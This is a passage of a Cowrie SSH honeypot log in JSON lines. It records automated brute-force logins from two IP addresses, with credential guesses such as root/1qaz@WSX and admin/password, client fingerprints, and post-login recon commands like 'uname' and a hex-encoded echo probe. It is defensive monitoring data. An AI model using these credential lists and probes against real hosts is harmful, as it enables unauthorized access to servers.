.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:13:24.473455Z","src_ip":"217.154.1.158","session":"bf90a35d70dc"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser123","message":"login attempt [ftpuser/ftpuser123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:13:24.529577Z","src_ip":"217.154.1.158","session":"bf90a35d70dc"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:13:25.546216Z","src_ip":"217.154.1.158","session":"bf90a35d70dc"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":52712,"dst_ip":"1.2.3.4","dst_port":22,"session":"64f6aad3babe","protocol":"ssh","message":"New connection: 217.154.1.158:52712 (1.2.3.4:22) [session: 64f6aad3babe]","sensor":"my-vps","timestamp":"2025-08-26T20:13:41.955484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:13:41.956224Z","src_ip":"217.154.1.158","session":"64f6aad3babe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:13:41.971979Z","src_ip":"217.154.1.158","session":"64f6aad3babe"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-26T20:13:42.015449Z","src_ip":"217.154.1.158","session":"64f6aad3babe"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:13:43.031835Z","src_ip":"217.154.1.158","session":"64f6aad3babe"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":45040,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae1bb81002fc","protocol":"ssh","message":"New connection: 217.154.1.158:45040 (1.2.3.4:22) [session: ae1bb81002fc]","sensor":"my-vps","timestamp":"2025-08-26T20:13:59.371846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:13:59.372716Z","src_ip":"217.154.1.158","session":"ae1bb81002fc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:13:59.386823Z","src_ip":"217.154.1.158","session":"ae1bb81002fc"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam123","message":"login attempt [steam/steam123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:13:59.428977Z","src_ip":"217.154.1.158","session":"ae1bb81002fc"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:14:00.444551Z","src_ip":"217.154.1.158","session":"ae1bb81002fc"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":48790,"dst_ip":"1.2.3.4","dst_port":22,"session":"8245862684d1","protocol":"ssh","message":"New connection: 217.154.1.158:48790 (1.2.3.4:22) [session: 8245862684d1]","sensor":"my-vps","timestamp":"2025-08-26T20:14:17.043613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:14:17.044827Z","src_ip":"217.154.1.158","session":"8245862684d1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:14:17.059486Z","src_ip":"217.154.1.158","session":"8245862684d1"}
{"eventid":"cowrie.login.failed","username":"es","password":"es","message":"login attempt [es/es] failed","sensor":"my-vps","timestamp":"2025-08-26T20:14:17.107137Z","src_ip":"217.154.1.158","session":"8245862684d1"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:14:18.123288Z","src_ip":"217.154.1.158","session":"8245862684d1"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":44356,"dst_ip":"1.2.3.4","dst_port":22,"session":"73a2e1429ca0","protocol":"ssh","message":"New connection: 217.154.1.158:44356 (1.2.3.4:22) [session: 73a2e1429ca0]","sensor":"my-vps","timestamp":"2025-08-26T20:14:34.676020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:14:34.676710Z","src_ip":"217.154.1.158","session":"73a2e1429ca0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:14:34.691177Z","src_ip":"217.154.1.158","session":"73a2e1429ca0"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX","message":"login attempt [root/1qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:14:34.735753Z","src_ip":"217.154.1.158","session":"73a2e1429ca0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:14:34.838334Z","src_ip":"217.154.1.158","session":"73a2e1429ca0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:14:34.839146Z","src_ip":"217.154.1.158","session":"73a2e1429ca0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:14:34.853984Z","src_ip":"217.154.1.158","session":"73a2e1429ca0"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:14:34.855142Z","src_ip":"217.154.1.158","session":"73a2e1429ca0"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":39258,"dst_ip":"1.2.3.4","dst_port":22,"session":"22cd21d07bc3","protocol":"ssh","message":"New connection: 217.154.1.158:39258 (1.2.3.4:22) [session: 22cd21d07bc3]","sensor":"my-vps","timestamp":"2025-08-26T20:14:52.186245Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:14:52.187298Z","src_ip":"217.154.1.158","session":"22cd21d07bc3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:14:52.201401Z","src_ip":"217.154.1.158","session":"22cd21d07bc3"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-26T20:14:52.245782Z","src_ip":"217.154.1.158","session":"22cd21d07bc3"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:14:53.262196Z","src_ip":"217.154.1.158","session":"22cd21d07bc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49294,"dst_ip":"1.2.3.4","dst_port":22,"session":"978467fb240a","protocol":"ssh","message":"New connection: 212.227.125.160:49294 (1.2.3.4:22) [session: 978467fb240a]","sensor":"my-vps","timestamp":"2025-08-26T20:15:01.665128Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T20:15:01.666126Z","src_ip":"212.227.125.160","session":"978467fb240a"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:01.667161Z","src_ip":"212.227.125.160","session":"978467fb240a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49302,"dst_ip":"1.2.3.4","dst_port":22,"session":"43292357f26c","protocol":"ssh","message":"New connection: 212.227.125.160:49302 (1.2.3.4:22) [session: 43292357f26c]","sensor":"my-vps","timestamp":"2025-08-26T20:15:01.713502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:01.715089Z","src_ip":"212.227.125.160","session":"43292357f26c"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:01.752215Z","src_ip":"212.227.125.160","session":"43292357f26c"}
{"eventid":"cowrie.login.success","username":"root","password":"blueberry","message":"login attempt [root/blueberry] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:01.853298Z","src_ip":"212.227.125.160","session":"43292357f26c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:02.042854Z","src_ip":"212.227.125.160","session":"43292357f26c"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:15:02.044207Z","src_ip":"212.227.125.160","session":"43292357f26c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:02.070261Z","src_ip":"212.227.125.160","session":"43292357f26c"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:02.072361Z","src_ip":"212.227.125.160","session":"43292357f26c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49318,"dst_ip":"1.2.3.4","dst_port":22,"session":"572f03290e06","protocol":"ssh","message":"New connection: 212.227.125.160:49318 (1.2.3.4:22) [session: 572f03290e06]","sensor":"my-vps","timestamp":"2025-08-26T20:15:05.142995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:05.157823Z","src_ip":"212.227.125.160","session":"572f03290e06"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:15:05.179542Z","src_ip":"212.227.125.160","session":"572f03290e06"}
{"eventid":"cowrie.login.success","username":"root","password":"sai","message":"login attempt [root/sai] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:15:05.259973Z","src_ip":"212.227.125.160","session":"572f03290e06"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:15:05.323859Z","src_ip":"212.227.125.160","session":"572f03290e06"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:15:05.324626Z","src_ip":"212.227.125.160","session":"572f03290e06"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:05.349230Z","src_ip":"212.227.125.160","session":"572f03290e06"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:05.350498Z","src_ip":"212.227.125.160","session":"572f03290e06"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":56712,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb571281679a","protocol":"ssh","message":"New connection: 217.154.1.158:56712 (1.2.3.4:22) [session: bb571281679a]","sensor":"my-vps","timestamp":"2025-08-26T20:15:09.887101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:09.888271Z","src_ip":"217.154.1.158","session":"bb571281679a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:15:09.902705Z","src_ip":"217.154.1.158","session":"bb571281679a"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-26T20:15:09.948264Z","src_ip":"217.154.1.158","session":"bb571281679a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:15:10.964505Z","src_ip":"217.154.1.158","session":"bb571281679a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52874,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a1ad6365b51","protocol":"ssh","message":"New connection: 212.227.125.160:52874 (1.2.3.4:22) [session: 4a1ad6365b51]","sensor":"my-vps","timestamp":"2025-08-26T20:15:20.372657Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:15:20.373867Z","src_ip":"212.227.125.160","session":"4a1ad6365b51"}
